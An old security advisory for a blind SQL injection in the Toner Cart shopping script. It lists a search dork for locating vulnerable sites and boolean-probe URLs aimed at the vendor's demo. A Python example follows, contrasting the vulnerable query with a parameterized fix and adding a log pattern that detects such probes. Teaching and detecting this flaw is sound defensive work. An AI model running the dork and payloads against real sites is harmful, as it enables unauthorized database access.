[x]========================================================================================================================================[x]
|                                                          AntiSecurity[dot]org                                                          |
[x]========================================================================================================================================[x]
| Title    : Toner Cart show_series_ink.php?id= Blind SQL Injection Vulnerability                                                          |
| Software : Toner Cart                                                                                                                  |
| Vendor   : http://www.vastal.com/                                                                                                      |
| Demo     : http://www.vastal.com/united/                                                                                               |
| Price    : $400.00                                                                                                                     |
| Date     : 23 September 2009 ( Indonesia )                                                                                             |
| Author   : OoN_Boy                                                                                                                     |
| Contact  : oon.boy9@gmail.com                                                                                                          |
| Web      : http://oonboy.info                                                                                                          |
| Blog     : http://oonboy.blogspot.com                                                                                                  |
[x]========================================================================================================================================[x]
| Description : Toner Cart has all features needed for a toner business to go online. You can separate all the different types of        |
|               toners, from ribbons to inkjets to laser toners; all can be added separately in the system. We divided the system into   |
|               3 parts so that it is easy for a customer to find a product they are interested in. The 3 parts include: Brands, Series, |
|               Sub Series and then products. We also provided an extensive search for the system so that customers can search for the  |
|               products they want. The script has a built-in affiliate system and ads management and is fully integrated with PayPal   |
|               and VeriSign. We have also provided an extensive admin panel so that you can manage all the chores with ease. Please     |
|               feel free to ask any questions; we will be more than glad to answer them.                                                |
|               Please note this is an open database, so there might be some problems relating to images and data on the server when    |
|               our customers and visitors try to edit it. But we upload the default database every week.                                |
[x]========================================================================================================================================[x]
| Dork : inurl: show_series_ink.php?id= "Powered by Vastal I-Tech & Co"                                                                  |
[x]========================================================================================================================================[x]
| Exploit : http://localhost/[path]/show_series_ink.php?id=[sql]                                                                         |
[x]========================================================================================================================================[x]
| Proof of concept : http://www.vastal.com/united/show_series_ink.php?id=5+and+substring(@@version,1,1)5 True                            |
|                    http://www.vastal.com/united/show_series_ink.php?id=5+and+substring(@@version,1,1)5 False                           |
[x]========================================================================================================================================[x]
| Greetz : antisecurity.org batamhacker.or.id                                                                                            |
|          h4ntu Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va                             |
|          k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere                              |
[x]========================================================================================================================================[x]
| Note : Please help to vote me in http://8.17.84.100/planyouradventour/profil_team.php?uid_group=1466598338                             |
[x]========================================================================================================================================[x]
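The proof of concept above works because the `id` parameter is concatenated into the SQL text, so a boolean condition appended by the client is evaluated by the database and the page's content reveals whether it was true. The following is an added example, not code from the advisory or from the Toner Cart product: it reproduces the vulnerable pattern beside a hardened version (integer allow-list plus a bound parameter), and adds a small access-log check for requests whose `id` carries a boolean tail. The table name `series_ink`, its schema, the sample rows and the log lines are all constructed assumptions; SQLite stands in for MySQL, so the condition is simplified to `1=1` / `1=2` rather than the `@@version` probe in the PoC.

```python
# Added example (not from the advisory or the Toner Cart code base): an
# interpolated id parameter beside a validated, parameterized one, plus a
# log check for the boolean-tail pattern seen in the advisory's probe URLs.
import re
import sqlite3

# Constructed stand-in for the script's series table; the real schema is unknown.
SAMPLE_ROWS = [(4, "Series A"), (5, "Series B"), (6, "Series C")]


def make_db():
    """Build an in-memory SQLite table (SQLite stands in for MySQL here)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE series_ink (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO series_ink VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def show_series_unsafe(conn, raw_id):
    """Vulnerable pattern: the request value becomes part of the SQL text.

    Any condition the client appends is evaluated by the database, so the
    result set leaks whether that condition held (boolean-based blind SQLi).
    """
    sql = "SELECT name FROM series_ink WHERE id = " + raw_id
    return [row[0] for row in conn.execute(sql)]


def show_series_safe(conn, raw_id):
    """Hardened pattern: allow-list the value, then bind it as a parameter.

    Returns None for input that is not a plain integer so the caller can
    answer with a 400 instead of running any query at all.
    """
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        return None
    cur = conn.execute("SELECT name FROM series_ink WHERE id = ?", (int(raw_id),))
    return [row[0] for row in cur]


# Boolean-tail signature for the id parameter in web server access logs:
# a numeric id, whitespace ('+' or '%20' in a URL), a boolean operator, more SQL.
SUSPICIOUS_ID = re.compile(
    r"[?&]id=\d+(?:\+|%20|\s)+(?:and|or)(?:\+|%20|\s)+\S", re.I
)


def flag_requests(log_lines):
    """Return the log lines whose query string carries an id with a SQL tail."""
    return [line for line in log_lines if SUSPICIOUS_ID.search(line)]


# Constructed access-log lines modelled on the advisory's probe URL (the
# comparison operator is filled in here; the advisory text lost it).
SAMPLE_LOG = [
    '203.0.113.9 - - [23/Sep/2009:10:00:01 +0700] "GET /united/show_series_ink.php?id=5 HTTP/1.1" 200 8123',
    '203.0.113.9 - - [23/Sep/2009:10:00:02 +0700] "GET /united/show_series_ink.php?id=5+and+substring(@@version,1,1)=5 HTTP/1.1" 200 8123',
    '203.0.113.9 - - [23/Sep/2009:10:00:03 +0700] "GET /united/show_series_ink.php?id=5%20and%201=2 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    db = make_db()
    # Unsafe: the appended condition decides whether the row comes back.
    print(show_series_unsafe(db, "5 and 1=1"), show_series_unsafe(db, "5 and 1=2"))
    # Safe: a plain id works, anything else is rejected before reaching SQL.
    print(show_series_safe(db, "5"), show_series_safe(db, "5 and 1=1"))
    print(len(flag_requests(SAMPLE_LOG)), "suspicious request(s)")
```

The unsafe handler returns "Series B" for `5 and 1=1` and nothing for `5 and 1=2`, which is exactly the true/false signal the PoC relies on; the hardened handler never lets the condition reach the database. In the PHP original the same fix is an integer check (for example `ctype_digit`) followed by a prepared statement, and the log check is the kind of rule a WAF or log-monitoring job would apply to the `id` parameter.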